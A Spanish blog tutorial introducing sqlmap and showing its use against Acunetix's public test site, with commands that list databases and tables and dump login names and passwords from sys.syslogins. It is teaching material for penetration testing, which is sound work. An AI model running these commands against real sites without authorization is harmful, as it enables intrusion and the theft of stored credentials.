SQLmap es una herramienta de pruebas de penetración de código abierto, que automatiza el proceso de detectar y explotar los errores de inyección SQL.
Esta herramienta realiza peticiones a los parámetros de una URL que se le indique, ya sea mediante una petición GET, POST, en las cookies, etc. Es capaz de explotar todo tipo de inyeccion sql.
La herramienta dispone de un wizard para ayudar a los principiantes, aunque recomiendo que no se utilice para acostumbrarse a todas sus funciones, así sabremos bien lo que hacemos en cada momento.
SQLmap es una herramienta que está escrita en python y se puede descargar desde su página oficial:
PoC
Para la prueba de concepto vamos a utilizar una web de Acunetix destinada a pruebas online, así vosotros mismos podréis seguir los ejemplos mientras leéis.
La url es la siguiente: http://testasp.vulnweb.com/showthread.asp?id=1
Para ver las opciones de las que disponemos con esta tool ejecutaremos el siguiente comando:
python sqlmap.py -h
Como podéis ver tiene bastantes opciones...
Bien, vamos a realizar una prueba con la web que os comentaba.
python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 --dbs
- -v 2: Elegimos el nivel 2 en Verbose, es decir, cuán detallado queremos que sea.
- --url: Escribimos el Target.
- --dbs: Indicamos que nos muestre las bases de datos.
Ahí las tenemos!!! ahora con el parámetro "--tables", le indicaremos que nos muestre las tablas de la base de datos que seleccionemos con el parámetro "-D database".
python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master --tables
python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master -T sys.syslogins --columns password --dump
Por último, queda por volcar los datos de la siguiente manera.
python sqlmap.py -v 2 --url=http://testasp.vulnweb.com/showthread.asp?id=1 -D master -T sys.syslogins -C loginname --dump
Os dejo con un video sobre SQLmap.
Saludos.
Referencias:
http://sqlmap.org/
https://www.owasp.org/index.php/Automated_Audit_using_SQLMap
http://highsec.es/2013/08/sqlmap-explotando-una-sql-injection/
**No me hago responsable del mal uso que se de a la información presentada. Esta información es de carácter didáctico.**
No hay comentarios:
Publicar un comentario